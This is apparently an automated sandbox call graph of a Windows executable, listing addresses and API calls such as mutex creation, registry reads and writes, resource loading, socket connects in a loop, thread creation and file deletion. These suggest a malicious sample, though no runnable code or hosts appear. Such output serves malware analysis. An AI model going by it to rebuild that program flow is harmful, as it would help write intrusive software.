401e65 22 API calls 47518->47519 47520 40f04b 47519->47520 47521 43baac _strftime 40 API calls 47520->47521 47522 40f058 47521->47522 47523 401e65 22 API calls 47522->47523 47524 40f063 47523->47524 47525 401e65 22 API calls 47524->47525 47526 40f074 47525->47526 47527 401e65 22 API calls 47526->47527 47528 40f089 47527->47528 47529 401e65 22 API calls 47528->47529 47530 40f09a 47529->47530 47531 40f0a1 StrToIntA 47530->47531 48033 409de4 47531->48033 47534 401e65 22 API calls 47535 40f0bc 47534->47535 47536 40f101 47535->47536 47537 40f0c8 47535->47537 47539 401e65 22 API calls 47536->47539 48262 4344ea 47537->48262 47541 40f111 47539->47541 47544 40f159 47541->47544 47545 40f11d 47541->47545 47542 401e65 22 API calls 47543 40f0e4 47542->47543 47546 40f0eb CreateThread 47543->47546 47548 401e65 22 API calls 47544->47548 47547 4344ea new 22 API calls 47545->47547 47546->47536 49227 419fb4 103 API calls 2 library calls 47546->49227 47549 40f126 47547->47549 47550 40f162 47548->47550 47551 401e65 22 API calls 47549->47551 47553 40f1cc 47550->47553 47554 40f16e 47550->47554 47552 40f138 47551->47552 47557 40f13f CreateThread 47552->47557 47555 401e65 22 API calls 47553->47555 47556 401e65 22 API calls 47554->47556 47558 40f1d5 47555->47558 47559 40f17e 47556->47559 47557->47544 49226 419fb4 103 API calls 2 library calls 47557->49226 47560 40f1e1 47558->47560 47561 40f21a 47558->47561 47562 401e65 22 API calls 47559->47562 47564 401e65 22 API calls 47560->47564 48058 41b60d 47561->48058 47565 40f193 47562->47565 47567 40f1ea 47564->47567 48269 40d9e8 31 API calls 47565->48269 47572 401e65 22 API calls 47567->47572 47568 401f13 28 API calls 47569 40f22e 47568->47569 47571 401f09 11 API calls 47569->47571 47574 40f237 47571->47574 47575 40f1ff 47572->47575 47573 40f1a6 47576 401f13 28 API calls 47573->47576 47577 40f240 SetProcessDEPPolicy 47574->47577 47578 40f243 CreateThread 47574->47578 47586 43baac _strftime 40 API calls 47575->47586 47579 40f1b2 47576->47579 47577->47578 47580 40f264 47578->47580 47581 40f258 CreateThread 47578->47581 49197 40f7a7 47578->49197 47582 401f09 11 API calls 47579->47582 47584 40f279 47580->47584 47585 40f26d CreateThread 47580->47585 47581->47580 49228 4120f7 138 API calls 47581->49228 47583 40f1bb CreateThread 47582->47583 47583->47553 49229 401be9 50 API calls _strftime 47583->49229 47588 40f2cc 47584->47588 47590 402093 28 API calls 47584->47590 47585->47584 49225 4126db 38 API calls ___scrt_get_show_window_mode 47585->49225 47587 40f20c 47586->47587 48270 40c162 7 API calls 47587->48270 48070 4134ff RegOpenKeyExA 47588->48070 47591 40f29c 47590->47591 48271 4052fd 28 API calls 47591->48271 47596 40f2ed 47598 41bc5e 28 API calls 47596->47598 47600 40f2fd 47598->47600 48272 41361b 31 API calls 47600->48272 47605 40f313 47606 401f09 11 API calls 47605->47606 47609 40f31e 47606->47609 47607 40f346 DeleteFileW 47608 40f34d 47607->47608 47607->47609 47608->47416 47609->47416 47609->47607 47610 40f334 Sleep 47609->47610 47610->47609 47611->47281 47612->47288 47613->47298 47614->47299 47615->47301 47616->47304 47617->47308 47619 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47618->47619 47631 43a43a 47619->47631 47623 438f4c 47624 438f57 47623->47624 47645 43a476 DeleteCriticalSection 47623->47645 47624->47310 47626 438f44 47626->47310 47673 44fb68 47627->47673 47630 438f5a 8 API calls 3 library calls 47630->47315 47632 43a443 47631->47632 47634 43a46c 47632->47634 47635 438f40 47632->47635 47646 438e7f 47632->47646 47651 43a476 DeleteCriticalSection 47634->47651 47635->47626 47637 43a3ec 47635->47637 47666 438d94 47637->47666 47639 43a3f6 47640 43a401 47639->47640 47671 438e42 6 API calls try_get_function 47639->47671 47640->47623 47642 43a40f 47643 43a41c 47642->47643 47672 43a41f 6 API calls ___vcrt_FlsFree 47642->47672 47643->47623 47645->47626 47652 438c73 47646->47652 47649 438eb6 InitializeCriticalSectionAndSpinCount 47650 438ea2 47649->47650 47650->47632 47651->47635 47653 438ca3 47652->47653 47654 438ca7 47652->47654 47653->47654 47658 438cc7 47653->47658 47659 438d13 47653->47659 47654->47649 47654->47650 47656 438cd3 GetProcAddress 47657 438ce3 __crt_fast_encode_pointer 47656->47657 47657->47654 47658->47654 47658->47656 47660 438d3b LoadLibraryExW 47659->47660 47665 438d30 47659->47665 47661 438d57 GetLastError 47660->47661 47662 438d6f 47660->47662 47661->47662 47663 438d62 LoadLibraryExW 47661->47663 47664 438d86 FreeLibrary 47662->47664 47662->47665 47663->47662 47664->47665 47665->47653 47667 438c73 try_get_function 5 API calls 47666->47667 47668 438dae 47667->47668 47669 438dc6 TlsAlloc 47668->47669 47670 438db7 47668->47670 47670->47639 47671->47642 47672->47640 47676 44fb81 47673->47676 47674 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47675 4345bd 47674->47675 47675->47313 47675->47630 47676->47674 47678 434b27 GetStartupInfoW 47677->47678 47678->47327 47680 44f06b 47679->47680 47681 44f062 47679->47681 47680->47331 47684 44ef58 47681->47684 47683->47331 47704 448215 GetLastError 47684->47704 47686 44ef65 47725 44f077 47686->47725 47688 44ef6d 47734 44ecec 47688->47734 47693 44efc7 47759 446782 20 API calls __dosmaperr 47693->47759 47697 44efc2 47758 4405dd 20 API calls _Atexit 47697->47758 47698 44ef84 47698->47680 47700 44f00b 47700->47693 47761 44ebc2 20 API calls 47700->47761 47701 44efdf 47701->47700 47760 446782 20 API calls __dosmaperr 47701->47760 47705 448237 47704->47705 47706 44822b 47704->47706 47763 445af3 20 API calls 3 library calls 47705->47763 47762 4487bc 11 API calls 2 library calls 47706->47762 47709 448231 47709->47705 47711 448280 SetLastError 47709->47711 47710 448243 47716 44824b 47710->47716 47765 448812 11 API calls 2 library calls 47710->47765 47711->47686 47714 448260 47714->47716 47717 448267 47714->47717 47715 448251 47719 44828c SetLastError 47715->47719 47764 446782 20 API calls __dosmaperr 47716->47764 47766 448087 20 API calls _Atexit 47717->47766 47768 4460f4 36 API calls 4 library calls 47719->47768 47720 448272 47767 446782 20 API calls __dosmaperr 47720->47767 47723 448298 47724 448279 47724->47711 47724->47719 47726 44f083 ___scrt_is_nonwritable_in_current_image 47725->47726 47727 448215 __Tolower 36 API calls 47726->47727 47732 44f08d 47727->47732 47729 44f111 ___scrt_is_nonwritable_in_current_image 47729->47688 47732->47729 47769 4460f4 36 API calls 4 library calls 47732->47769 47770 445888 EnterCriticalSection 47732->47770 47771 446782 20 API calls __dosmaperr 47732->47771 47772 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47732->47772 47773 43a7b7 47734->47773 47737 44ed0d GetOEMCP 47739 44ed36 47737->47739 47738 44ed1f 47738->47739 47740 44ed24 GetACP 47738->47740 47739->47698 47741 446137 47739->47741 47740->47739 47742 446175 47741->47742 47746 446145 __Getctype 47741->47746 47784 4405dd 20 API calls _Atexit 47742->47784 47743 446160 RtlAllocateHeap 47745 446173 47743->47745 47743->47746 47745->47693 47748 44f119 47745->47748 47746->47742 47746->47743 47783 442f80 7 API calls 2 library calls 47746->47783 47749 44ecec 38 API calls 47748->47749 47750 44f138 47749->47750 47753 44f189 IsValidCodePage 47750->47753 47755 44f13f 47750->47755 47757 44f1ae ___scrt_get_show_window_mode 47750->47757 47751 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47752 44efba 47751->47752 47752->47697 47752->47701 47754 44f19b GetCPInfo 47753->47754 47753->47755 47754->47755 47754->47757 47755->47751 47785 44edc4 GetCPInfo 47757->47785 47758->47693 47759->47698 47760->47700 47761->47693 47762->47709 47763->47710 47764->47715 47765->47714 47766->47720 47767->47724 47768->47723 47769->47732 47770->47732 47771->47732 47772->47732 47774 43a7d4 47773->47774 47780 43a7ca 47773->47780 47775 448215 __Tolower 36 API calls 47774->47775 47774->47780 47776 43a7f5 47775->47776 47781 448364 36 API calls __Tolower 47776->47781 47778 43a80e 47782 448391 36 API calls __fassign 47778->47782 47780->47737 47780->47738 47781->47778 47782->47780 47783->47746 47784->47745 47791 44edfe 47785->47791 47794 44eea8 47785->47794 47788 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47790 44ef54 47788->47790 47790->47755 47795 45112c 47791->47795 47793 44ae66 _swprintf 41 API calls 47793->47794 47794->47788 47796 43a7b7 __fassign 36 API calls 47795->47796 47797 45114c MultiByteToWideChar 47796->47797 47799 451222 47797->47799 47800 45118a 47797->47800 47801 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47799->47801 47803 446137 ___crtLCMapStringA 21 API calls 47800->47803 47805 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 47800->47805 47804 44ee5f 47801->47804 47802 45121c 47814 435e40 20 API calls _free 47802->47814 47803->47805 47809 44ae66 47804->47809 47805->47802 47807 4511f0 MultiByteToWideChar 47805->47807 47807->47802 47808 45120c GetStringTypeW 47807->47808 47808->47802 47810 43a7b7 __fassign 36 API calls 47809->47810 47811 44ae79 47810->47811 47815 44ac49 47811->47815 47814->47799 47816 44ac64 ___crtLCMapStringA 47815->47816 47817 44ac8a MultiByteToWideChar 47816->47817 47818 44acb4 47817->47818 47819 44ae3e 47817->47819 47822 446137 ___crtLCMapStringA 21 API calls 47818->47822 47825 44acd5 __alloca_probe_16 47818->47825 47820 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47819->47820 47821 44ae51 47820->47821 47821->47793 47822->47825 47823 44ad8a 47851 435e40 20 API calls _free 47823->47851 47824 44ad1e MultiByteToWideChar 47824->47823 47826 44ad37 47824->47826 47825->47823 47825->47824 47842 448bb3 47826->47842 47830 44ad61 47830->47823 47833 448bb3 _strftime 11 API calls 47830->47833 47831 44ad99 47834 446137 ___crtLCMapStringA 21 API calls 47831->47834 47837 44adba __alloca_probe_16 47831->47837 47832 44ae2f 47850 435e40 20 API calls _free 47832->47850 47833->47823 47834->47837 47835 448bb3 _strftime 11 API calls 47838 44ae0e 47835->47838 47837->47832 47837->47835 47838->47832 47839 44ae1d WideCharToMultiByte 47838->47839 47839->47832 47840 44ae5d 47839->47840 47852 435e40 20 API calls _free 47840->47852 47843 4484ca _Atexit 5 API calls 47842->47843 47844 448bda 47843->47844 47847 448be3 47844->47847 47853 448c3b 10 API calls 3 library calls 47844->47853 47846 448c23 LCMapStringW 47846->47847 47848 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47847->47848 47849 448c35 47848->47849 47849->47823 47849->47830 47849->47831 47850->47823 47851->47819 47852->47823 47853->47846 47855 41cb8f LoadLibraryA GetProcAddress 47854->47855 47856 41cb7f GetModuleHandleA GetProcAddress 47854->47856 47857 41cbb8 44 API calls 47855->47857 47858 41cba8 LoadLibraryA GetProcAddress 47855->47858 47856->47855 47857->47335 47858->47857 48275 41b4a8 FindResourceA 47859->48275 47863 40f3ed _Yarn 48285 4020b7 47863->48285 47866 401fe2 28 API calls 47867 40f413 47866->47867 47868 401fd8 11 API calls 47867->47868 47869 40f41c 47868->47869 47870 43bd51 new 21 API calls 47869->47870 47871 40f42d _Yarn 47870->47871 48291 406dd8 47871->48291 47873 40f460 47873->47337 47875 40210c 47874->47875 47876 4023ce 11 API calls 47875->47876 47877 402126 47876->47877 47878 402569 28 API calls 47877->47878 47879 402134 47878->47879 47879->47340 48345 4020df 47880->48345 47882 401fd8 11 API calls 47883 41bed0 47882->47883 47884 401fd8 11 API calls 47883->47884 47887 41bed8 47884->47887 47885 41bea0 47888 4041a2 28 API calls 47885->47888 47890 401fd8 11 API calls 47887->47890 47891 41beac 47888->47891 47889 41be2e 47889->47885 47893 401fe2 28 API calls 47889->47893 47897 401fd8 11 API calls 47889->47897 47901 41be9e 47889->47901 48349 4041a2 47889->48349 48352 41ce34 47889->48352 47894 40ea24 47890->47894 47892 401fe2 28 API calls 47891->47892 47895 41beb5 47892->47895 47893->47889 47902 40fb17 47894->47902 47896 401fd8 11 API calls 47895->47896 47898 41bebd 47896->47898 47897->47889 47899 41ce34 28 API calls 47898->47899 47899->47901 47901->47882 47903 40fb23 47902->47903 47905 40fb2a 47902->47905 48394 402163 11 API calls 47903->48394 47905->47345 47907 402163 47906->47907 47911 40219f 47907->47911 48395 402730 11 API calls 47907->48395 47909 402184 48396 402712 11 API calls std::_Deallocate 47909->48396 47911->47347 47913 401e6d 47912->47913 47914 401e75 47913->47914 48397 402158 22 API calls 47913->48397 47914->47352 47918 4020df 11 API calls 47917->47918 47919 40532a 47918->47919 48398 4032a0 47919->48398 47921 405346 47921->47361 48402 4051ef 47922->48402 47924 406391 48406 402055 47924->48406 47927 401fe2 47928 401ff1 47927->47928 47929 402039 47927->47929 47930 4023ce 11 API calls 47928->47930 47936 401fd8 47929->47936 47931 401ffa 47930->47931 47932 40203c 47931->47932 47933 402015 47931->47933 47934 40267a 11 API calls 47932->47934 48438 403098 28 API calls 47933->48438 47934->47929 47937 4023ce 11 API calls 47936->47937 47938 401fe1 47937->47938 47938->47372 47940 401fd2 47939->47940 47941 401fc9 47939->47941 47940->47378 48439 4025e0 28 API calls 47941->48439 48440 401fab 47943->48440 47945 40d073 CreateMutexA GetLastError 47945->47394 48441 41bfb7 47946->48441 47951 401fe2 28 API calls 47952 41b2ff 47951->47952 47953 401fd8 11 API calls 47952->47953 47954 41b307 47953->47954 47955 4135a6 31 API calls 47954->47955 47957 41b35d 47954->47957 47956 41b330 47955->47956 47958 41b33b StrToIntA 47956->47958 47957->47401 47959 41b349 47958->47959 47962 41b352 47958->47962 48449 41cf69 22 API calls 47959->48449 47961 401fd8 11 API calls 47961->47957 47962->47961 47964 40772a 47963->47964 47965 413549 3 API calls 47964->47965 47966 407731 47965->47966 47966->47411 47966->47412 47968 41bc72 47967->47968 48450 40b904 47968->48450 47970 41bc7a 47970->47428 47972 401f22 47971->47972 47979 401f6a 47971->47979 47973 402252 11 API calls 47972->47973 47974 401f2b 47973->47974 47975 401f6d 47974->47975 47977 401f46 47974->47977 48483 402336 47975->48483 48482 40305c 28 API calls 47977->48482 47980 401f09 47979->47980 47981 402252 11 API calls 47980->47981 47982 401f12 47981->47982 47982->47441 47984 413965 47983->47984 47985 406dd8 28 API calls 47984->47985 47986 41397a 47985->47986 47987 4020f6 28 API calls 47986->47987 47988 41398a 47987->47988 47989 41376f 14 API calls 47988->47989 47990 413994 47989->47990 47991 401fd8 11 API calls 47990->47991 47992 4139a1 47991->47992 47992->47489 47994 40209b 47993->47994 47995 4023ce 11 API calls 47994->47995 47996 4020a6 47995->47996 48487 4024ed 47996->48487 48000 413788 47999->48000 48001 4137bf 47999->48001 48004 41379a RegSetValueExA RegCloseKey 48000->48004 48002 401fd8 11 API calls 48001->48002 48003 40ef9e 48002->48003 48003->47491 48004->48001 48006 43bac5 _strftime 48005->48006 48491 43ae03 48006->48491 48008 40efb7 48008->47497 48008->47499 48010 41b5a0 48009->48010 48011 41b505 GetLocalTime 48009->48011 48013 401fd8 11 API calls 48010->48013 48012 40531e 28 API calls 48011->48012 48015 41b547 48012->48015 48014 41b5a8 48013->48014 48016 401fd8 11 API calls 48014->48016 48017 406383 28 API calls 48015->48017 48018 40f00d 48016->48018 48019 41b553 48017->48019 48018->47515 48518 402f10 48019->48518 48022 406383 28 API calls 48023 41b56b 48022->48023 48523 407200 77 API calls 48023->48523 48025 41b579 48026 401fd8 11 API calls 48025->48026 48027 41b585 48026->48027 48028 401fd8 11 API calls 48027->48028 48029 41b58e 48028->48029 48030 401fd8 11 API calls 48029->48030 48031 41b597 48030->48031 48032 401fd8 11 API calls 48031->48032 48032->48010 48034 409e02 _wcslen 48033->48034 48035 409e24 48034->48035 48036 409e0d 48034->48036 48038 40da34 31 API calls 48035->48038 48037 40da34 31 API calls 48036->48037 48039 409e15 48037->48039 48040 409e2c 48038->48040 48041 401f13 28 API calls 48039->48041 48042 401f13 28 API calls 48040->48042 48043 409e1f 48041->48043 48044 409e3a 48042->48044 48047 401f09 11 API calls 48043->48047 48045 401f09 11 API calls 48044->48045 48046 409e42 48045->48046 48542 40915b 28 API calls 48046->48542 48049 409e79 48047->48049 48527 40a109 48049->48527 48050 409e54 48543 403014 48050->48543 48055 401f13 28 API calls 48056 409e69 48055->48056 48057 401f09 11 API calls 48056->48057 48057->48043 48059 41b630 GetUserNameW 48058->48059 48747 40417e 48059->48747 48064 403014 28 API calls 48065 41b672 48064->48065 48066 401f09 11 API calls 48065->48066 48067 41b67b 48066->48067 48068 401f09 11 API calls 48067->48068 48069 40f223 48068->48069 48069->47568 48071 413520 RegQueryValueExA RegCloseKey 48070->48071 48072 40f2e4 48070->48072 48071->48072 48072->47440 48072->47596 48074 40f392 48073->48074 48075 413a3f RegDeleteValueW 48073->48075 48074->47435 48075->48074 48077 40dd5b 48076->48077 48078 4134ff 3 API calls 48077->48078 48079 40dd62 48078->48079 48083 40dd81 48079->48083 48841 401707 48079->48841 48081 40dd6f 48844 413877 RegCreateKeyA 48081->48844 48084 414f2a 48083->48084 48085 4020df 11 API calls 48084->48085 48086 414f3e 48085->48086 48864 41b8b3 48086->48864 48089 4020df 11 API calls 48090 414f54 48089->48090 48091 401e65 22 API calls 48090->48091 48092 414f62 48091->48092 48093 43baac _strftime 40 API calls 48092->48093 48094 414f6f 48093->48094 48095 414f81 48094->48095 48096 414f74 Sleep 48094->48096 48097 402093 28 API calls 48095->48097 48096->48095 48098 414f90 48097->48098 48099 401e65 22 API calls 48098->48099 48100 414f99 48099->48100 48101 4020f6 28 API calls 48100->48101 48102 414fa4 48101->48102 48103 41be1b 28 API calls 48102->48103 48104 414fac 48103->48104 48868 40489e WSAStartup 48104->48868 48106 414fb6 48107 401e65 22 API calls 48106->48107 48108 414fbf 48107->48108 48109 401e65 22 API calls 48108->48109 48157 41503e 48108->48157 48110 414fd8 48109->48110 48113 401e65 22 API calls 48110->48113 48111 401e65 22 API calls 48111->48157 48112 4020f6 28 API calls 48112->48157 48114 414fe9 48113->48114 48116 401e65 22 API calls 48114->48116 48115 41be1b 28 API calls 48115->48157 48117 414ffa 48116->48117 48118 401e65 22 API calls 48117->48118 48120 41500b 48118->48120 48119 406c1e 28 API calls 48119->48157 48122 401e65 22 API calls 48120->48122 48121 401fe2 28 API calls 48121->48157 48123 41501c 48122->48123 48125 401e65 22 API calls 48123->48125 48124 401fd8 11 API calls 48124->48157 48126 41502e 48125->48126 48998 40473d 89 API calls 48126->48998 48129 41518c WSAGetLastError 48999 41cae1 30 API calls 48129->48999 48133 402093 28 API calls 48136 41519c 48133->48136 48136->48133 48139 401e8d 11 API calls 48136->48139 48140 401e65 22 API calls 48136->48140 48141 43baac _strftime 40 API calls 48136->48141 48136->48157 48177 41b4ef 80 API calls 48136->48177 48178 415a71 CreateThread 48136->48178 48179 401fd8 11 API calls 48136->48179 48180 401f09 11 API calls 48136->48180 49000 4052fd 28 API calls 48136->49000 49002 40b051 85 API calls 48136->49002 49003 404e26 99 API calls 48136->49003 48138 40531e 28 API calls 48138->48157 48139->48136 48140->48136 48142 415acf Sleep 48141->48142 48142->48136 48143 406383 28 API calls 48143->48157 48144 402f10 28 API calls 48144->48157 48145 402093 28 API calls 48145->48157 48146 41b4ef 80 API calls 48146->48157 48149 40905c 28 API calls 48149->48157 48150 441e81 20 API calls 48150->48157 48151 4136f8 3 API calls 48151->48157 48152 4135a6 31 API calls 48152->48157 48153 40417e 28 API calls 48153->48157 48157->48111 48157->48112 48157->48115 48157->48119 48157->48121 48157->48124 48157->48129 48157->48136 48157->48138 48157->48143 48157->48144 48157->48145 48157->48146 48157->48149 48157->48150 48157->48151 48157->48152 48157->48153 48158 41bb8e 28 API calls 48157->48158 48159 401e65 22 API calls 48157->48159 48869 414ee9 48157->48869 48874 40482d 48157->48874 48881 404f51 48157->48881 48896 4048c8 connect 48157->48896 48956 41b7e0 48157->48956 48959 4145bd 48157->48959 48962 40dd89 48157->48962 48968 41bc42 28 API calls 48157->48968 48969 41bd1e 28 API calls 48157->48969 48158->48157 48160 415439 GetTickCount 48159->48160 48161 41bb8e 28 API calls 48160->48161 48169 415456 48161->48169 48163 41bb8e 28 API calls 48163->48169 48166 41bd1e 28 API calls 48166->48169 48168 406383 28 API calls 48168->48169 48169->48163 48169->48166 48169->48168 48170 402ea1 28 API calls 48169->48170 48171 402f10 28 API calls 48169->48171 48173 401fd8 11 API calls 48169->48173 48174 401f09 11 API calls 48169->48174 48970 41bae6 48169->48970 48972 41ba96 48169->48972 48977 40f8d1 29 API calls 48169->48977 48978 402f31 28 API calls 48169->48978 48979 404c10 48169->48979 49001 404aa1 61 API calls _Yarn 48169->49001 48170->48169 48171->48169 48173->48169 48174->48169 48177->48136 48178->48136 49187 41ad17 105 API calls 48178->49187 48179->48136 48180->48136 48181->47353 48182->47360 48183->47365 48186 4020df 11 API calls 48185->48186 48187 406c2a 48186->48187 48188 4032a0 28 API calls 48187->48188 48189 406c47 48188->48189 48189->47386 48191 413573 RegQueryValueExA RegCloseKey 48190->48191 48192 40eba4 48190->48192 48191->48192 48192->47383 48192->47400 48193->47389 48194->47419 48195->47412 48196->47403 48197->47417 48199 401f86 11 API calls 48198->48199 48200 40da50 48199->48200 48201 40da66 48200->48201 48202 40da70 48200->48202 48203 40daa5 48200->48203 48204 40db99 GetLongPathNameW 48201->48204 49188 41b5b4 29 API calls 48202->49188 48205 41bfb7 GetCurrentProcess 48203->48205 48207 40417e 28 API calls 48204->48207 48208 40daaa 48205->48208 48210 40dbae 48207->48210 48211 40db00 48208->48211 48212 40daae 48208->48212 48209 40da79 48213 401f13 28 API calls 48209->48213 48215 40417e 28 API calls 48210->48215 48216 40417e 28 API calls 48211->48216 48217 40417e 28 API calls 48212->48217 48214 40da83 48213->48214 48221 401f09 11 API calls 48214->48221 48218 40dbbd 48215->48218 48219 40db0e 48216->48219 48220 40dabc 48217->48220 49191 40ddd1 28 API calls 48218->49191 48225 40417e 28 API calls 48219->48225 48226 40417e 28 API calls 48220->48226 48221->48201 48223 40dbd0 49192 402fa5 28 API calls 48223->49192 48228 40db24 48225->48228 48229 40dad2 48226->48229 48227 40dbdb 49193 402fa5 28 API calls 48227->49193 49190 402fa5 28 API calls 48228->49190 49189 402fa5 28 API calls 48229->49189 48233 40db2f 48236 401f13 28 API calls 48233->48236 48234 40dadd 48237 401f13 28 API calls 48234->48237 48235 40dbe5 48238 401f09 11 API calls 48235->48238 48240 40db3a 48236->48240 48241 40dae8 48237->48241 48239 40dbef 48238->48239 48242 401f09 11 API calls 48239->48242 48243 401f09 11 API calls 48240->48243 48244 401f09 11 API calls 48241->48244 48245 40dbf8 48242->48245 48246 40db43 48243->48246 48247 40daf1 48244->48247 48248 401f09 11 API calls 48245->48248 48249 401f09 11 API calls 48246->48249 48250 401f09 11 API calls 48247->48250 48251 40dc01 48248->48251 48249->48214 48250->48214 48252 401f09 11 API calls 48251->48252 48253 40dc0a 48252->48253 48254 401f09 11 API calls 48253->48254 48255 40dc13 48254->48255 48255->47476 48256->47490 48257->47511 48259 41371e RegQueryValueExA RegCloseKey 48258->48259 48260 413742 48258->48260 48259->48260 48260->47467 48261->47504 48266 4344ef 48262->48266 48263 43bd51 new 21 API calls 48263->48266 48264 40f0d1 48264->47542 48266->48263 48266->48264 49194 442f80 7 API calls 2 library calls 48266->49194 49195 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48266->49195 49196 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48266->49196 48269->47573 48270->47561 48272->47605 48273->47410 48276 41b4c5 LoadResource LockResource SizeofResource 48275->48276 48277 40f3de 48275->48277 48276->48277 48278 43bd51 48277->48278 48283 446137 __Getctype 48278->48283 48279 446175 48295 4405dd 20 API calls _Atexit 48279->48295 48280 446160 RtlAllocateHeap 48282 446173 48280->48282 48280->48283 48282->47863 48283->48279 48283->48280 48294 442f80 7 API calls 2 library calls 48283->48294 48286 4020bf 48285->48286 48296 4023ce 48286->48296 48288 4020ca 48300 40250a 48288->48300 48290 4020d9 48290->47866 48292 4020b7 28 API calls 48291->48292 48293 406dec 48292->48293 48293->47873 48294->48283 48295->48282 48297 4023d8 48296->48297 48298 402428 48296->48298 48297->48298 48307 4027a7 11 API calls std::_Deallocate 48297->48307 48298->48288 48301 40251a 48300->48301 48302 402520 48301->48302 48303 402535 48301->48303 48308 402569 48302->48308 48318 4028e8 48303->48318 48306 402533 48306->48290 48307->48298 48329 402888 48308->48329 48310 40257d 48311 402592 48310->48311 48312 4025a7 48310->48312 48334 402a34 22 API calls 48311->48334 48314 4028e8 28 API calls 48312->48314 48317 4025a5 48314->48317 48315 40259b 48335 4029da 22 API calls 48315->48335 48317->48306 48319 4028f1 48318->48319 48320 402953 48319->48320 48321 4028fb 48319->48321 48343 4028a4 22 API calls 48320->48343 48324 402904 48321->48324 48325 402917 48321->48325 48337 402cae 48324->48337 48327 402915 48325->48327 48328 4023ce 11 API calls 48325->48328 48327->48306 48328->48327 48330 402890 48329->48330 48331 402898 48330->48331 48336 402ca3 22 API calls 48330->48336 48331->48310 48334->48315 48335->48317 48338 402cb8 __EH_prolog 48337->48338 48344 402e54 22 API calls 48338->48344 48340 4023ce 11 API calls 48342 402d92 48340->48342 48341 402d24 48341->48340 48342->48327 48344->48341 48346 4020e7 48345->48346 48347 4023ce 11 API calls 48346->48347 48348 4020f2 48347->48348 48348->47889 48363 40423a 48349->48363 48353 41ce41 48352->48353 48354 41cea0 48353->48354 48356 41ce51 48353->48356 48355 41ceba 48354->48355 48357 41cfe0 28 API calls 48354->48357 48378 41d146 28 API calls 48355->48378 48359 41ce89 48356->48359 48369 41cfe0 48356->48369 48357->48355 48377 41d146 28 API calls 48359->48377 48360 41ce9c 48360->47889 48364 404243 48363->48364 48365 4023ce 11 API calls 48364->48365 48366 40424e 48365->48366 48367 402569 28 API calls 48366->48367 48368 4041b5 48367->48368 48368->47889 48371 41cfe8 48369->48371 48370 41d01a 48370->48359 48371->48370 48372 41d01e 48371->48372 48375 41d002 48371->48375 48389 402725 22 API calls 48372->48389 48379 41d051 48375->48379 48377->48360 48378->48360 48380 41d05b __EH_prolog 48379->48380 48390 402717 22 API calls 48380->48390 48382 41d06e 48391 41d15d 11 API calls 48382->48391 48384 41d094 48385 41d0cc 48384->48385 48392 402730 11 API calls 48384->48392 48385->48370 48387 41d0b3 48393 402712 11 API calls std::_Deallocate 48387->48393 48390->48382 48391->48384 48392->48387 48393->48385 48394->47905 48395->47909 48396->47911 48400 4032aa 48398->48400 48399 4032c9 48399->47921 48400->48399 48401 4028e8 28 API calls 48400->48401 48401->48399 48403 4051fb 48402->48403 48412 405274 48403->48412 48405 405208 48405->47924 48407 402061 48406->48407 48408 4023ce 11 API calls 48407->48408 48409 40207b 48408->48409 48434 40267a 48409->48434 48413 405282 48412->48413 48414 405288 48413->48414 48415 40529e 48413->48415 48423 4025f0 48414->48423 48417 4052f5 48415->48417 48418 4052b6 48415->48418 48432 4028a4 22 API calls 48417->48432 48421 4028e8 28 API calls 48418->48421 48422 40529c 48418->48422 48421->48422 48422->48405 48424 402888 22 API calls 48423->48424 48425 402602 48424->48425 48426 402672 48425->48426 48427 402629 48425->48427 48433 4028a4 22 API calls 48426->48433 48430 4028e8 28 API calls 48427->48430 48431 40263b 48427->48431 48430->48431 48431->48422 48435 40268b 48434->48435 48436 4023ce 11 API calls 48435->48436 48437 40208d 48436->48437 48437->47927 48438->47929 48439->47940 48442 41bfc4 GetCurrentProcess 48441->48442 48443 41b2d1 48441->48443 48442->48443 48444 4135a6 RegOpenKeyExA 48443->48444 48445 4135d4 RegQueryValueExA RegCloseKey 48444->48445 48446 4135fe 48444->48446 48445->48446 48447 402093 28 API calls 48446->48447 48448 413613 48447->48448 48448->47951 48449->47962 48451 40b90c 48450->48451 48456 402252 48451->48456 48453 40b917 48460 40b92c 48453->48460 48455 40b926 48455->47970 48457 40225c 48456->48457 48458 4022ac 48456->48458 48457->48458 48467 402779 11 API calls std::_Deallocate 48457->48467 48458->48453 48461 40b966 48460->48461 48462 40b938 48460->48462 48479 4028a4 22 API calls 48461->48479 48468 4027e6 48462->48468 48466 40b942 48466->48455 48467->48458 48469 4027ef 48468->48469 48470 402851 48469->48470 48471 4027f9 48469->48471 48481 4028a4 22 API calls 48470->48481 48474 402802 48471->48474 48475 402815 48471->48475 48480 402aea 28 API calls __EH_prolog 48474->48480 48477 402813 48475->48477 48478 402252 11 API calls 48475->48478 48477->48466 48478->48477 48480->48477 48482->47979 48484 402347 48483->48484 48485 402252 11 API calls 48484->48485 48486 4023c7 48485->48486 48486->47979 48488 4024f9 48487->48488 48489 40250a 28 API calls 48488->48489 48490 4020b1 48489->48490 48490->47482 48507 43ba0a 48491->48507 48493 43ae50 48494 43a7b7 __fassign 36 API calls 48493->48494 48499 43ae5c 48494->48499 48495 43ae15 48495->48493 48496 43ae2a 48495->48496 48506 43ae2f _Atexit 48495->48506 48512 4405dd 20 API calls _Atexit 48496->48512 48500 43ae8b 48499->48500 48513 43ba4f 40 API calls __Toupper 48499->48513 48502 43aef7 48500->48502 48514 43b9b6 20 API calls 2 library calls 48500->48514 48515 43b9b6 20 API calls 2 library calls 48502->48515 48504 43afbe _strftime 48504->48506 48516 4405dd 20 API calls _Atexit 48504->48516 48506->48008 48508 43ba22 48507->48508 48509 43ba0f 48507->48509 48508->48495 48517 4405dd 20 API calls _Atexit 48509->48517 48511 43ba14 _Atexit 48511->48495 48512->48506 48513->48499 48514->48502 48515->48504 48516->48506 48517->48511 48524 401fb0 48518->48524 48520 402f1e 48521 402055 11 API calls 48520->48521 48522 402f2d 48521->48522 48522->48022 48523->48025 48525 4025f0 28 